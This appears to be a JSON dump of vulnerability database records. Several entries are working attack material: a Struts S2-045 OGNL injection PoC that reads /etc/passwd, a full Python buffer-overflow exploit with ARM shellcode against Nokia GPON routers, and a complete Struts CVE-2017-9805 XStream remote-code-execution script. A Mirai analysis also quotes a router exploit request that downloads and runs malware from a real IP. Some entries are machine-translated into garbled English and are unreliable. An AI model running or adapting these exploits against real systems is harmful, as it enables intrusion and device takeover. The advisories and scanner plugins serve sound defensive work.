\nheader1 ={ \n\"Host\":\"alumnus. shu. edu. cn\", \n\"Connection\":\"keep-alive\", \n\"Refer\":\"alumnus. shu. edu. cn\", \n\"Accept\":\"*/*\", \n\"X-Requested-With\":\"XMLHttpRequest\", \n\"Accept-Encoding\":\"deflate\", \n\"Accept-Language\":\"zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4\", \n} \ndef poc(): \nregister_openers() \ndatagen, headers = multipart_encode({\"image1\": open(\"tmp.txt\", \"rb\")}) \nheader[\"User-Agent\"]=\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36\" \nheader[\"Content-Type\"]=\"'%{(#nike,='multipart/form-data'). \n(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). \n(#_memberAccess? (#_memberAccess=#dm): \n((#container=#context['com. opensymphony. xwork2. ActionContext. container']). \n(#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). \n(#ognlUtil. getExcludedPackageNames(). clear()). (#ognlUtil. getExcludedClasses(). clear()). \n(#context. setMemberAccess(#dm)))). (#cmd='cat /etc/passwd'). \n(#iswin=(@java.lang.System@getProperty('os. name'). toLowerCase(). contains('win'))). \n(#cmds=(#iswin? {'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). \n(#p=new java. lang. ProcessBuilder(#cmds)). (#p. redirectErrorStream(true)). \n(#process=#p. start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse(). \ngetOutputStream())). (@org.apache.commons.io.IOUtils@copy(#process. getInputStream(),#ros)). \n(#ros. flush())}\"' \nrequest = urllib2. Request(str(sys. argv[1]),datagen,headers=header) \nresponse = urllib2. urlopen(request) \nprint the response. read() \n\npoc() \n\n", "modified": "2017-03-07T00:00:00", "published": "2017-03-07T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/84026.htm", "id": "MYHACK58:62201784026", "type": "myhack58", "title": "Apache Struts2 exposure arbitrary code execution vulnerability (S2-045,CVE-2017-5638)-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-09-06T21:13:29", "bulletinFamily": "info", "description": "The REST Plugin is using a XStreamHandler with an instance of XStream for deserialization without any type of filtering and this can lead to Remote Code Execution when deserializing XML payloads. - The Apache Struts civil peace Bulletin(reference 1) \n2017 9 5 March, the Apache Struts announcement of the latest ping notification Bulletin, the Apache Struts2 REST plug-in there a long code to fulfill the high-risk flaws, the flaws by lgtm. com peace fellow report instructions, the flaws numbered CVE-2017-9805\uff08S2-052 to. Struts2 REST plugin XStream components deserialization flaws, the application of the XStream component of the XML pattern of the data packet to stop the reverse sequence of manipulation, not the data content to stop useful to verify, the presence of safe risks, can be long-distance onslaught with. \nStruts2-enabled rest-plugin after and to prepare and set up XStreamHandler, the ability to incur long-distance order to fulfil this major achievement. \n0x01 flaws affect the \nAffect \nSure CVE-2017-9805 is a high-risk flaws. The reality of the scene, there must be limitations, need satisfaction must be the premise that non-struts their acquiescence to the opening of the Assembly. \nImpact version \nVersion 2.5.0 to 2.5.12 \nVersion 2.3.0 to 2.3.33 \nFix version \nThe Struts 2.5.13 \nThe Struts 2.3.34 \n0x02 flaws before \nTips details \n! [](/Article/UploadPic/2017-9/201796185648496. png? www. myhack58. com) \n\u6587\u4ef6/org/apache/struts2/rest/ContentTypeInterceptor.java \nIn the struts2 rest-plugin in the Dispose logic in the interface was the corresponding pattern of the news, will be diverted once the registration of the corresponding handler to the handler. the toobject way to stop it is instantiated, where the incoming xml news, to Is it will jump to once the world said XStreamHandler of the toobject way \n! [](/Article/UploadPic/2017-9/201796185648956. png? www. myhack58. com) \nIn Britain at the end here fromXML way after incurring an instance of the vicious thoughts of the object to be fulfilled, leading to vicious thoughts of the code to fulfill \n! [](/Article/UploadPic/2017-9/201796185648504. png? www. myhack58. com) \nThen see the calculator is the victory pop-up \nFlaws repair \n! [](/Article/UploadPic/2017-9/201796185648972. png? www. myhack58. com) \nThe new version adds XStreamPermissionProvider \n! [](/Article/UploadPic/2017-9/201796185648551. png? www. myhack58. com) \nAnd will come there are scores of createXStream stop rewriting, adds check, rebuff uneven security class to fulfill \n0x03 flaws in the application of verification \n! [](/Article/UploadPic/2017-9/201796185648981. png? www. myhack58. com) \n0x04 repair initiative \n1. Civil initiative set the plugin to dispose of the data sample is limited to json \n2. Upgrade Struts to 2. 5. 13 version or 2. 3. 34 version \n3. In XStreamHandler stop data parity or reflection\n", "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/89104.htm", "id": "MYHACK58:62201789104", "title": "Apache Struts2\u2013052 vulnerability research alert-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-27T18:39:10", "bulletinFamily": "info", "description": "One, Foreword \nRecently, Tencent Security Cloud Ding lab to listen to the wind threat perception platform monitoring the discovery A to attack router worm, after analysis, found that this worm is mirai virus new variants, and before mirai viruses, the worms not only by the early generation of mirai using the telnent blast to attack more through the router vulnerability to attack propagation. \n\nSecond, the Playload and vulnerability analysis \nThe sample in the propagation and attack involved in the process to 4 PlayLoad, are for the router to attack, we will for related vulnerabilities are introduced, and for the spread of the use of sampling data for statistical analysis. Table PlayLoad case: \n! [](/Article/UploadPic/2018-11/20181127223313501.jpg) \nFigure impact of device distribution: \n! [](/Article/UploadPic/2018-11/20181127223313341. png) \nData source: Tencent Security Cloud Ding laboratory \nOn the figure is several the router vulnerability the national level, China, Russia, Japan and the United States are affected more severely in the country. With the national level of development, the network popularity there is a certain relationship, but also with the above several router sales area has a strong Association. Since the domestic equipment and more, security is not high, China's future IoT security is facing enormous challenges. \nBelow we address these four vulnerabilities were introduced: \n01 NetGear router any execution vulnerability CNNVD-201306-024\uff09 \n1. the vulnerability analysis: \nThe POC through the GET method to perform the setup. cgi, by the todo command is executed syscmd, by syscmd to execute the download and execution of virus commands. \nGET/setup. cgi? next_file=netgear. cfg&amp;todo;=syscmd&amp;cmd;=rm+-rf+/tmp/*;wget+http://46.17.47.82/gvv+-O+/tmp/nigger;sh+nigger+netgear&amp;curpath;=/&amp;currentsetting.htm;=1 HTTP/1.1 rnrn \nThe code is as follows: \nA, execute the setup. cgi after executing setup_main: the \n! [](/Article/UploadPic/2018-11/20181127223313703. png) \nB, use the GET and POST methods can be submitted to the POC of: \n! [](/Article/UploadPic/2018-11/20181127223313103. png) \nTodo parameter directly behind the transfer of the file, without doing any filtering, there is also the use of local, direct calls syscmd to execute their desired commands. \n! [](/Article/UploadPic/2018-11/20181127223313724. png) \n2. the spread of cases: \nFigure NetGear DGN devices remote arbitrary command execution vulnerability attack data statistical sampling \n! [](/Article/UploadPic/2018-11/20181127223314826. png) \nData source: Tencent Security Cloud Ding laboratory \nInitiated NetGear exploit most of the region is Russia, it can be inferred with a NetGear vulnerability scanning, virus vector infection. \n02 GPON fiber router command execution vulnerability, CVE-2018-10561/62\uff09 \n1. the vulnerability analysis: \nOn the device running the HTTP server in the authenticate check a particular path, the attacker can use this feature to bypass any terminal on the authentication. \nThrough in URL after adding a specific parameter ? images/eventually get access: \nhttp://ip:port/menu.html?images/ \nhttp://ip:port/GponForm/diag_FORM?images/ \nFigure GPONPlayLoad: the \n! [](/Article/UploadPic/2018-11/20181127223314476. png) \n2. the spread of cases: \nFigure GPON device to a remote arbitrary command execution vulnerability attack data statistical sampling \n! [](/Article/UploadPic/2018-11/20181127223314850. png) \nData source: Tencent Security Cloud Ding laboratory \nThe vulnerability of viral vector infection of a large range, for China, Georgia, Egypt the impact of the most widely used. China, the United States of the optical fiber is developing rapidly, Egypt and Georgia by the Chinese influence, the fiber development speed is also very fast, and also their affected equipment and more for a reason. \n03 Huawei HG532 series router remote command execution leakage\uff08CVE-2017-17215\uff09 \n1. the vulnerability analysis: \nFigure HG532 PlayLoad \n! [](/Article/UploadPic/2018-11/20181127223314383. png) \nWe can observe POC first submit an identity authentication information, after the upgrade the inside of the NewStatusURL tag performed want to execute the command. Module in the upnp, we find the upnp module, and find NEwStatusURL tag, the code directly through the SYSTEM to perform command-upg-g-u %s-t \u2018Firmware Upgrade....\u2019that Do not do any filtering. \n! [](/Article/UploadPic/2018-11/20181127223314572. png) \n2. the spread of cases: \nFigure Huawei HG532 device remote command execution vulnerability attack data statistical sampling \n! [](/Article/UploadPic/2018-11/20181127223314295. png) \nData source: Tencent Security Cloud Ding laboratory \nFigure CVE-2017-17215 world sphere of influence \n! [](/Article/UploadPic/2018-11/20181127223314846. png) \nData source: Tencent Security Cloud Ding laboratory \nThrough the Huawei HG532 device remote command execution attack statistics, as can be seen, the use of this vulnerability to viral vectors or scan in China, Japan, Russia is very active. \n04 Linksys multiple routers tmUnblock. cgi ttcp_ip parameter remote command execution vulnerability CNVD-2014-01260\uff09 \n\n\n**[1] [[2]](<92188_2.htm>) [next](<92188_2.htm>)**\n", "modified": "2018-11-27T00:00:00", "published": "2018-11-27T00:00:00", "id": "MYHACK58:62201892188", "href": "http://www.myhack58.com/Article/html/3/62/2018/92188.htm", "title": "Router vulnerability-prone, Mirai new variant of the struck-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:02", "bulletinFamily": "exploit", "description": "\nAlcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow", "modified": "2019-02-28T00:00:00", "published": "2019-02-28T00:00:00", "id": "EXPLOITPACK:C890361C9DA2FA0264352384567E504E", "href": "", "title": "Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow", "type": "exploitpack", "sourceData": "#!/usr/bin/python3\n\n\nimport argparse\nimport requests\nimport urllib.parse\nimport binascii\nimport re\n\n\ndef run(target):\n \"\"\" Execute exploitation \"\"\"\n # We're using CVE-2018-10561 and/or it's extension in order to exploit this \n # Authenticated RCE in usb_Form method of GPON ONT. We can also exploit this \n # issue after successful authentication: \"useradmin\" permission is enough\n #\n # IP Spoofing. Perspective option here too\n #\n\n # Step 1. Just a request to adjust stack for the exploit to work\n #\n # POST /GponForm/device_Form?script/ HTTP/1.1\n # Host: 192.168.1.1\n # User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\n # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n # Accept-Language: en-US,en;q=0.5\n # Accept-Encoding: gzip, deflate\n # Referer: http://192.168.1.1/device.html\n # Content-Type: application/x-www-form-urlencoded\n # Content-Length: 55\n # Connection: close\n # Upgrade-Insecure-Requests: 1\n #\n # XWebPageName=device&admin_action=usb_enable&usbenable=1\n\n headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate',\n 'Referer':'http://192.168.1.1/device.html', 'Content-Type':'application/x-www-form-urlencoded',\n 'Connection': 'close', 'Upgrade-Insecure-Requests':'1', 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'}\n payload = {'XWebPageName':'device', 'admin_action':'usb_enable', 'usbenable':1}\n try:\n requests.post(urllib.parse.urljoin(target, '/GponForm/device_Form?script/'), data=payload, verify=False, headers=headers, timeout=2)\n except:\n pass\n\n # Step 2. Actual Exploitation\n #\n # POST /GponForm/usb_Form?script/ HTTP/1.1\n # Host: 192.168.1.1\n # User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\n # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n # Accept-Language: en-US,en;q=0.5\n # Accept-Encoding: gzip, deflate\n # Referer: http://192.168.1.1/usb.html\n # Content-Type: application/x-www-form-urlencoded\n # Content-Length: 639\n # Connection: close\n # Upgrade-Insecure-Requests: 1\n\n # XWebPageName=usb&ftpenable=0&url=ftp%3A%2F%2F&urlbody=&mode=ftp_anonymous&webdir=&port=21&clientusername=BBBBEBBBBDDDDBBBBBCCCCBBBBAAAABBBBAABBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAABBBBBBEEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&clientpassword=&ftpdir=&ftpdirname=undefined&clientaction=download&iptv_wan=2&mvlan=-1\n \n # Weaponizing request:\n\n # mov r8, r8 ; NOP for ARM Thumb\n\n nop = \"\\xc0\\x46\"\n \n # .section .text\n # .global _start\n # \n # _start:\n # .code 32\n # add r3, pc, #1\n # bx r3\n # \n # ; We've removed prev commands as processor is already in Thumb mode\n #\n # .code 16\n # add r0, pc, #8\n # eor r1, r1, r1\n # eor r2, r2, r2\n # strb r2, [r0, #10] ; Changing last char of command to \\x00 in runtime\n # mov r7, #11\n # svc #1\n # .ascii \"/bin/tftpdX\" \n\n shellcode = \"\\x02\\xa0\\x49\\x40\\x52\\x40\\x82\\x72\\x0b\\x27\\x01\\xdf\\x2f\\x62\\x69\\x6e\\x2f\\x74\\x66\\x74\\x70\\x64\\x58\"\n\n # Overwritting only 3 bytes in order to get \\x00 in 4th\n\n pc = \"\\xe1\\x8c\\x03\"\n\n exploit = \"A\" + 197 * nop + shellcode + 26*\"A\" + pc \n\n payload = {'XWebPageName':'usb', 'ftpenable':'0', 'url':'ftp%3A%2F%2F', 'urlbody':'', 'mode':'ftp_anonymous', \n 'webdir':'', 'port':21, 'clientusername':exploit, 'clientpassword':'', 'ftpdir':'', \n 'ftpdirname':'undefined', 'clientaction':'download', 'iptv_wan':'2', 'mvlan':'-1'}\n headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate',\n 'Referer':'http://192.168.1.1/usb.html', 'Content-Type':'application/x-www-form-urlencoded',\n 'Connection': 'close', 'Upgrade-Insecure-Requests':'1', \n 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'} \n # Prevent requests from URL encoding\n payload_str = \"&\".join(\"%s=%s\" % (k,v) for k,v in payload.items())\n try:\n requests.post(urllib.parse.urljoin(target, '/GponForm/usb_Form?script/'), data=payload_str, headers=headers, verify=False, timeout=2)\n except:\n pass\n\n print(\"The payload has been sent. Please check UDP 69 port of router for the tftpd service\");\n print(\"You can use something like: sudo nmap -sU -p 69 192.168.1.1\");\n\n\ndef main():\n \"\"\" Parse command line arguments and start exploit \"\"\"\n \n #\n # Exploit should be executed after reboot. You can easily achive this in 3 ways:\n # 1) Send some request to crash WebMgr (any DoS based on BoF). Router will be rebooted after that\n # 2) Use CVE-2018-10561 to bypass authentication and trigger reboot from \"device.html\" page\n # 3) Repeat this exploit at least twice ;)\n # any of those will work!\n #\n \n parser = argparse.ArgumentParser(\n add_help=False,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"Examples: %(prog)s -t http://192.168.1.1/\")\n\n # Adds arguments to help menu\n parser.add_argument(\"-h\", action=\"help\", help=\"Print this help message then exit\")\n parser.add_argument(\"-t\", dest=\"target\", required=\"yes\", help=\"Target URL address like: https://localhost:443/\")\n\n # Assigns the arguments to various variables\n args = parser.parse_args()\n\n run(args.target)\n\n\n#\n# Main\n#\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:03", "bulletinFamily": "exploit", "description": "\nApache Struts 2.5 2.5.12 - REST Plugin XStream Remote Code Execution", "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "id": "EXPLOITPACK:DEBBBD9CB5D7CBBF28AAD15BB9949E3A", "href": "", "title": "Apache Struts 2.5 2.5.12 - REST Plugin XStream Remote Code Execution", "type": "exploitpack", "sourceData": "# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE\n# Google Dork: filetype:action\n# Date: 06/09/2017\n# Exploit Author: Warflop\n# Vendor Homepage: https://struts.apache.org/\n# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip\n# Version: Struts 2.5 \u2013 Struts 2.5.12\n# Tested on: Struts 2.5.10\n# CVE : 2017-9805\n\n#!/usr/bin/env python3\n# coding=utf-8\n# *****************************************************\n# Struts CVE-2017-9805 Exploit\n# Warflop (http://securityattack.com.br/)\n# Greetz: Pimps & G4mbl3r\n# *****************************************************\nimport requests\nimport sys\n\ndef exploration(command):\n\n\texploit = '''\n\t\t\t\t<map>\n\t\t\t\t<entry>\n\t\t\t\t<jdk.nashorn.internal.objects.NativeString>\n\t\t\t\t<flags>0</flags>\n\t\t\t\t<value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n\t\t\t\t<dataHandler>\n\t\t\t\t<dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n\t\t\t\t<is class=\"javax.crypto.CipherInputStream\">\n\t\t\t\t<cipher class=\"javax.crypto.NullCipher\">\n\t\t\t\t<initialized>false</initialized>\n\t\t\t\t<opmode>0</opmode>\n\t\t\t\t<serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n\t\t\t\t<iter class=\"javax.imageio.spi.FilterIterator\">\n\t\t\t\t<iter class=\"java.util.Collections$EmptyIterator\"/>\n\t\t\t\t<next class=\"java.lang.ProcessBuilder\">\n\t\t\t\t<command>\n\t\t\t\t<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>\n\t\t\t\t</command>\n\t\t\t\t<redirectErrorStream>false</redirectErrorStream>\n\t\t\t\t</next>\n\t\t\t\t</iter>\n\t\t\t\t<filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n\t\t\t\t<method>\n\t\t\t\t<class>java.lang.ProcessBuilder</class>\n\t\t\t\t<name>start</name>\n\t\t\t\t<parameter-types/>\n\t\t\t\t</method>\n\t\t\t\t<name>foo</name>\n\t\t\t\t</filter>\n\t\t\t\t<next class=\"string\">foo</next>\n\t\t\t\t</serviceIterator>\n\t\t\t\t<lock/>\n\t\t\t\t</cipher>\n\t\t\t\t<input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n\t\t\t\t<ibuffer/>\n\t\t\t\t<done>false</done>\n\t\t\t\t<ostart>0</ostart>\n\t\t\t\t<ofinish>0</ofinish>\n\t\t\t\t<closed>false</closed>\n\t\t\t\t</is>\n\t\t\t\t<consumed>false</consumed>\n\t\t\t\t</dataSource>\n\t\t\t\t<transferFlavors/>\n\t\t\t\t</dataHandler>\n\t\t\t\t<dataLen>0</dataLen>\n\t\t\t\t</value>\n\t\t\t\t</jdk.nashorn.internal.objects.NativeString>\n\t\t\t\t<jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n\t\t\t\t</entry>\n\t\t\t\t<entry>\n\t\t\t\t<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n\t\t\t\t<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n\t\t\t\t</entry>\n\t\t\t\t</map>\n\t\t\t\t'''\n\n\n\turl = sys.argv[1]\n\n\theaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',\n\t\t\t'Content-Type': 'application/xml'}\n\n\trequest = requests.post(url, data=exploit, headers=headers)\n\tprint (request.text)\n\nif len(sys.argv) < 3:\n\tprint ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')\n\tprint ('[*] Warflop - http://securityattack.com.br')\n\tprint ('[*] Greatz: Pimps & G4mbl3r')\n\tprint ('[*] Use: python struts2.py URL COMMAND')\n\tprint ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')\n\texit(0)\nelse:\n\texploration(sys.argv[2])", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-11-23T14:56:22", "bulletinFamily": "bugbounty", "bounty": 200.0, "description": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0430 portal.sf.mail.ru\r\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c \u043a\u0443\u0441\u043a\u0430\u043c\u0438 \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c \u0434\u043e 64\u041a\u0411. \u041f\u0440\u0438\u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0432\u0443\u0441\u0442\u043e\u0440\u043e\u043d\u043d\u044f\u044f, \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0447\u0438\u0442\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043d\u043e \u0438 \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0447\u0430\u0441\u0442\u044c \u0432\u0430\u0448\u0435\u0439 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u043a\u0430\u043a \u044d\u0442\u043e \u0441\u0434\u0435\u043b\u0430\u043b \u0438 \u044f \u0440\u0430\u0434\u0438 \u0447\u0438\u0441\u0442\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430.", "modified": "2014-12-10T19:29:15", "published": "2014-10-23T15:12:13", "id": "H1:32570", "href": "https://hackerone.com/reports/32570", "type": "hackerone", "title": "Mail.ru: OpenSSL HeartBleed (CVE-2014-0160)", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:07", "bulletinFamily": "unix", "description": "### Background\n\nWebmin is a web-based interface for Unix-like systems. Usermin is a simplified version of Webmin designed for use by normal users rather than system administrators. \n\n### Description\n\nA vulnerability in both Webmin and Usermin has been discovered by Kenny Chen, wherein simplify_path is called before the HTML is decoded. \n\n### Impact\n\nA non-authenticated user can read any file on the server using a specially crafted URL. \n\n### Workaround\n\nFor a temporary workaround, IP Access Control can be setup on Webmin and Usermin. \n\n### Resolution\n\nAll Webmin users should update to the latest stable version: \n \n \n # emerge --sync\n # emerge --ask --verbose --oneshot \">=app-admin/webmin-1.290\"\n\nAll Usermin users should update to the latest stable version: \n \n \n # emerge --sync\n # emerge --ask --verbose --oneshot \">=app-admin/usermin-1.220\"", "modified": "2006-08-06T00:00:00", "published": "2006-08-06T00:00:00", "id": "GLSA-200608-11", "href": "https://security.gentoo.org/glsa/200608-11", "type": "gentoo", "title": "Webmin, Usermin: File Disclosure", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "description": "## Vulnerability Description\nWebmin / Usermin contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an unspecified error occurs during URL handling by simplify_path() function, which will disclose files content information resulting in a loss of confidentiality.\n## Solution Description\nUpgrade to Webmin version 1.290, Usermin version 1.220, or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nWebmin / Usermin contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an unspecified error occurs during URL handling by simplify_path() function, which will disclose files content information resulting in a loss of confidentiality.\n## References:\nVendor URL: http://www.webmin.com/\nVendor Specific News/Changelog Entry: http://www.webmin.com/changes.html\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200608-11.xml)\n[Secunia Advisory ID:21105](https://secuniaresearch.flexerasoftware.com/advisories/21105/)\n[Secunia Advisory ID:22556](https://secuniaresearch.flexerasoftware.com/advisories/22556/)\n[Secunia Advisory ID:20892](https://secuniaresearch.flexerasoftware.com/advisories/20892/)\n[Secunia Advisory ID:21365](https://secuniaresearch.flexerasoftware.com/advisories/21365/)\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:125\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1199\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000911.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0149.html\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000910.html\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000912.html\nFrSIRT Advisory: ADV-2006-2612\n[CVE-2006-3392](https://vulners.com/cve/CVE-2006-3392)\nBugtraq ID: 18744\n", "modified": "2006-06-29T04:19:23", "published": "2006-06-29T04:19:23", "href": "https://vulners.com/osvdb/OSVDB:26772", "id": "OSVDB:26772", "type": "osvdb", "title": "Webmin/Usermin simplify_path() Failure Arbitrary File Disclosure", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:24", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-10-04T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57067", "id": "OPENVAS:57067", "title": "FreeBSD Ports: webmin", "type": "openvas", "sourceData": "#\n#VID 227475c2-09cb-11db-9156-000e0c2e438a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n webmin\n usermin\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.webmin.com/security.html\nhttp://www.vuxml.org/freebsd/227475c2-09cb-11db-9156-000e0c2e438a.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(57067);\n script_version(\"$Revision: 4203 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-10-04 07:30:30 +0200 (Tue, 04 Oct 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-3392\");\n script_bugtraq_id(18744);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"FreeBSD Ports: webmin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 